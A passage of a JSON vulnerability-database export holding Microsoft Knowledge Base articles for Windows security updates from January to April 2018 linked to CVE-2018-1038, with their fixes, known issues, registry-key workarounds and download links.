This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td class=\"x-hidden-focus\"><p>Symptom</p></td><td>Workaround</td></tr><tr><td class=\"x-hidden-focus\"><p>Microsoft has reports of some customers on a small subset of older AMD processors getting into an unbootable state after installing this KB.<br/>\u00a0<br/>To prevent this issue, Microsoft will temporarily pause Windows OS updates to devices with impacted AMD processors at this time.</p></td><td><p><span>This issue is resolved in <a data-content-id=\"4073578\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4073578</a>.</span></p></td></tr><tr><td class=\"x-hidden-focus\"><span>Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</span></td><td><p><span><span><span>This\u00a0issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>.\u00a0</span></span></span><span><span><span>You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</span></span></span></p><p><span><span><span><span><span>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\</span></span><span><span>cadca5fe-87d3-4b96-b7fb-a231484277cc</span></span></span></span></span></p></td></tr><tr><td class=\"x-hidden-focus\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1:</p><p>\u00a0HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4056897\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/3/8/C/38CAB8B3-AFE5-41C4-B85E-C909CE59061A/4056897.csv\" target=\"_blank\">file information for\u00a0update 4056897</a>.</p></div></body></html>", "edition": 2, "modified": "2018-08-23T01:03:11", "id": "KB4056897", "href": "https://support.microsoft.com/en-us/help/4056897/", "published": "2018-01-03T00:00:00", "title": "January 3, 2018\u2014KB4056897 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:34:59", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4093108, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes quality improvements. No new operating system features are being introduced in this update. 
Key changes include:</p><ul><li><p><span><span><span><span>Windows Update and WSUS will offer this update to applicable Windows client and server operating systems, regardless of the existence or value of the \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\</span></span></span><span><span><span><span>cadca5fe-87d3-4b96-b7fb-a231484277cc</span></span></span></span><span><span><span>\" registry setting. </span></span></span><span><span><span><span>This change has been made to protect user data.</span></span></span></span> </span></p></li><li><p>Improves reliability in the kernel, and addresses an issue that can cause applications to have unexpected memory contents on multi-processor systems.</p></li><li><p>Addresses a stop error that occurred when the previous month\u2019s update was applied to a 32-bit (x86) computer with a Physical Address Extension (PAE) mode disabled.</p></li><li>Security updates to Internet Explorer, Microsoft scripting engine, Microsoft graphics component, Windows Server, Windows datacenter networking, Windows virtualization and kernel, and Windows app platform and frameworks.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p><p><strong>Note: </strong>This update supercedes update\u00a0<a href=\"https://support.microsoft.com/help/4100480/\">4100480</a>,\u00a0Windows kernel update for CVE-2018-1038.</p></div><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p><span>This update is now available for installation through WSUS</span>. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4093108\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/7/A/4/7A4CFA42-F311-4FDB-B2A1-B7664CFEA96F/4093108.csv\" target=\"\">file information for update 4093108</a>.</p></div></body></html>", "edition": 2, "modified": "2018-06-15T23:33:19", "id": "KB4093108", "href": "https://support.microsoft.com/en-us/help/4093108/", "published": "2018-04-10T00:00:00", "title": "April 10, 2018\u2014KB4093108 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:46:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4074587, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security 
update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:</p><ul><li>Security updates to Windows Graphics, Windows Kernel, Common Log File System driver, Microsoft Windows Search component, and Windows storage and file systems.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Because of an issue that affects some versions of antivirus software, this fix is being applied only to the computers on which the antivirus ISV has updated the ALLOW REGKEY.<br/>\u00a0</td><td><p>This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>. 
You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the following registry value is set to 1: \u00a0</p><p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><p>\u00a0</p><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4074587\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/F/5/5/F5500476-AD7B-4C80-A330-1570D83B4734/4074587.csv\" target=\"\">file information for update 4074587</a>.</p></div></body></html>", "edition": 2, "modified": "2018-08-23T01:42:31", "id": "KB4074587", "href": "https://support.microsoft.com/en-us/help/4074587/", "published": "2018-02-13T00:00:00", "title": "February 13, 2018\u2014KB4074587 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:45:47", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4074598, including 
improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4057400\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4057400</a> (released January 19, 2018) and addresses the following issues:</p><ul><li><p>Addresses issue with editing input fields in some applications in Internet Explorer.</p></li><li><p>Addresses a script-related issue that caused Internet Explorer to stop working in some cases.</p></li><li><p>Addresses issue with launching a new page in Internet Explorer.</p></li><li>Security updates to Internet Explorer, Windows Graphics, Windows Kernel, Common Log File System driver, Microsoft Windows Search component, and Windows storage and file systems.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. 
This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Because of an issue that affects some versions of antivirus software, this fix is being applied only to the computers on which the antivirus ISV has updated the ALLOW REGKEY.</td><td><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p></td></tr><tr><td>The LSM.EXE process and applications that call SCardEstablishContext or SCardReleaseContext may experience a handle leak. Once the leaked handle count reaches a certain threshold, smart card-based operations fail with error \"SCARD_E_NO_SERVICE\". Confirm that the scenario matches by reviewing the handle counts for LSM.EXE and the calling processes in the process tab of Task Manager or an equivalent application.</td><td><p>This issue is resolved in <a data-content-id=\"4091290\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4091290</a>.</p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><p>\u00a0</p></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4074598\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/0/3/7/0377D053-8FDA-4A2A-8AFF-6398527607E5/4074598.csv\" target=\"\">file information for update 4074598</a>.</p></div></body></html>", "edition": 16, "modified": "2018-08-23T01:40:46", "id": "KB4074598", "href": "https://support.microsoft.com/en-us/help/4074598/", "published": "2018-02-13T00:00:00", "title": "February 13, 2018\u2014KB4074598 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:53:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4088875, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4075211\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4075211</a> (released February 21, 2018) and addresses the following 
issues:</p><ul><li><p>Addresses an issue in which Internet Explorer is unresponsive in certain scenarios when a Browser Helper Object is installed.</p></li><li><p>Updates legacy Document Mode cell visibility\u00a0in Internet Explorer.</p></li><li><p>Addresses an issue in which Internet Explorer stops working in certain printing scenarios.</p></li><li><p>Addresses an issue in which Internet Explorer stops working when using F12-based developer tools.</p></li><li><p>Provides cumulative Spectre and Meltdown protections for 32-Bit (x86) and 64-Bit (x64) versions of Windows except the <a data-content-id=\"4078130\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4078130</a> update that was offered to disable mitigation against Spectre Variant 2.</p></li><li><p>Provides security updates to Internet Explorer, the Microsoft Graphics component, Windows Kernel, Windows Shell, Windows MSXML, Windows Installer, and Windows Hyper-V.</p></li></ul><p>For more information about the resolved security vulnerabilities, see the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. 
This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\">After you install this update, security settings in some organizations that are running Windows 7 SP1 or Windows Server 2008 R2 may prevent Internet Explorer 11 from starting because of an invalid SHA1 certificate.</td><td valign=\"top\"><p>Whitelist the SHA1 certificate to allow Internet Explorer 11 to start.</p><p><span><span>- OR -</span></span></p><p><span><span>Install <a data-content-id=\"4096040\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Cumulative update for Internet Explorer: March 23, 2018</a>.</span></span></p></td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the following registry value is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs if this update is applied to a 32-Bit (x86) machine with Physical Address Extension (PAE) mode disabled.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</td><td valign=\"top\"><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p></td></tr><tr><td valign=\"top\"><span>A new Ethernet Network Interface Card (NIC) that has default settings may replace the previously existing NIC, causing network issues after you apply this update. 
Any custom settings on the previous NIC persist in the registry but are unused.</span></td><td valign=\"top\"><p><span>This issue has been resolved in <a href=\"https://support.microsoft.com/help/4093118\" managed-link=\"\">KB4093118</a>.\u00a0\u00a0</span><span> </span></p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>Static IP address settings are lost after you apply this update.</span></td><td valign=\"top\"><div class=\"WordSection1\"><p><span>This issue has been resolved in <a href=\"https://support.microsoft.com/help/4093118\" managed-link=\"\">KB4093118</a>. \u00a0</span></p></div></td></tr><tr><td valign=\"top\"><span>After you install this update, you may receive a Stop error message that resembles the following when you log off the computer:</span><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span>SESSION_HAS_VALID_POOL_ON_EXIT (ab)</span></p></div></div></div></div></td><td valign=\"top\"><span>To resolve this issue, apply update <a data-content-id=\"4099467\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4099467</a>.</span></td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. This occurs because of an issue related to a missing file, oem<number>.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. 
Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr></tbody></table><p>\u00a0</p><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4088875\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/F/A/0/FA0D3F7D-5362-4A3E-91F6-1544EA04624F/4088875.csv\" target=\"\">file information for\u00a0update 4088875</a>.\u00a0</p></div></body></html>", "edition": 16, "modified": "2018-09-10T17:09:40", "id": "KB4088875", "href": "https://support.microsoft.com/en-us/help/4088875/", "published": "2018-03-13T00:00:00", "title": "March 13, 2018\u2014KB4088875 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:29", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4093118, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4088881\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4088881 </a>(released March 23, 2018) and addresses the following issues:</p><ul><li><p><span>Addresses an issue where a new Ethernet Network Interface Card (NIC) that has default settings may replace the previously existing NIC, 
causing network issues</span></p></li><li><p><span>Addresses an issue where static IP address settings can be lost</span></p></li><li><p>Windows Update and WSUS will offer this update to applicable Windows client and server operating systems regardless of the existence or value of the \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc\" registry setting. This change has been made to protect user data.\u00a0</p></li><li><p>Improves reliability in the kernel,\u00a0and addresses an issue that can cause applications to have unexpected memory contents on multiprocessor systems.</p></li><li>Addresses an issue with printing content generated by ActiveX\u00a0in Internet Explorer.</li><li>Addresses\u00a0an access violation on certain pages in Internet Explorer\u00a0when it\u00a0renders\u00a0SVGs under high load.</li><li>Addresses an issue that, in some instances, prevents Internet Explorer from identifying custom controls.</li><li>Addresses a stop error that occurred when the previous month\u2019s update was applied to a 32-bit (x86) computer with Physical Address Extension (PAE) mode disabled.</li><li>Security updates to Internet Explorer, Microsoft scripting engine, Microsoft graphics component, Windows Server, Windows datacenter networking, Windows virtualization and kernel, and Windows app platform and frameworks.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the\u00a0</span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</span></span></span></p><p><strong>Note:</strong></p><ul><li>This update supersedes update\u00a0<a href=\"https://support.microsoft.com/help/4100480/\">4100480</a>,\u00a0the Windows kernel update for CVE-2018-1038.</li><li>A resync is required to get the newer revision of this KB in WSUS environments.</li></ul><h2>Known issues in this update</h2><div><table 
class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. This occurs because of an issue related to a missing file, oem<number>.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. 
Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr><tr><td valign=\"top\">After installing this update, some Windows 7.0 SP1 files reverted to older versions.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103713\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103713</a>.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4093118\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/B/6/4/B64EACD1-5783-49E5-9809-5C204D0924B5/4093118.csv\" target=\"\">file information for\u00a0update 4093118</a>.\u00a0</p></div></body></html>", "edition": 16, "modified": "2018-09-10T17:13:01", "id": "KB4093118", "href": "https://support.microsoft.com/en-us/help/4093118/", "published": "2018-04-10T00:00:00", "title": "April 10, 2018\u2014KB4093118 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:13", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4088878, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes quality improvements. No new operating system features are being introduced in this update. 
Important\u00a0changes include the following:</p><ul><li>Spectre and Meltdown protections for 32-Bit (x86) and 64-Bit (x64) versions of Windows, except the <a data-content-id=\"4078130\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4078130</a> update that was offered to disable mitigation against Spectre Variant 2.</li><li>Security updates to the Microsoft Graphics component, Windows Kernel, Windows Shell, Windows MSXML, Windows Installer, and Windows Hyper-V.</li></ul><p>For more information about the resolved security vulnerabilities, see the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. 
This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the following registry value is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs if this update is applied to a 32-Bit (x86) computer that has Physical Address Extension (PAE) mode disabled.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</td><td valign=\"top\"><p>This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p></td></tr><tr><td valign=\"top\"><span>After you apply this update, a new Ethernet Network Interface Card (NIC) that has default settings may replace the previous NIC and cause network issues. 
Any custom settings on the previous NIC persist in the registry but aren't used.</span></td><td valign=\"top\"><p><span><span><span><span><span> <span>This issue can be resolved by installing <a href=\"https://support.microsoft.com/en-us/help/4099950\" target=\"_blank\">KB4099950</a> prior to this update.</span> </span></span></span></span></span></p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>Static IP address settings are lost after you apply this update.</span></td><td valign=\"top\"><div class=\"WordSection1\"><p><span><span><span><span><span><span><span><span>This issue can be resolved by installing <a href=\"https://support.microsoft.com/en-us/help/4099950\" target=\"_blank\"><u>KB4099950</u></a> prior to this update.</span></span></span></span></span></span></span></span></p></div></td></tr><tr><td valign=\"top\"><span>After you install this update, you may receive a Stop error message that resembles the following when you log off the computer: </span><span> </span><span> </span><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span>SESSION_HAS_VALID_POOL_ON_EXIT (ab)</span></p></div></div></div></div></td><td valign=\"top\">To resolve this issue, apply update <a data-content-id=\"4099467\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"\">KB4099467</a>.</td></tr><tr><td valign=\"top\">A 32-bit (x86) computer won\u2019t boot or keeps restarting after applying this security update.</td><td valign=\"top\"><p>Before applying this security update and subsequent security updates, uninstall the following external drivers until they are fixed by the vendor that owns them:</p><ul><li>HASP Kernel Device Driver (a.k.a. Haspnt.sys)</li><li>Hard Lock Key Drivers (a.k.a. hardlock.sys)</li></ul></td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. 
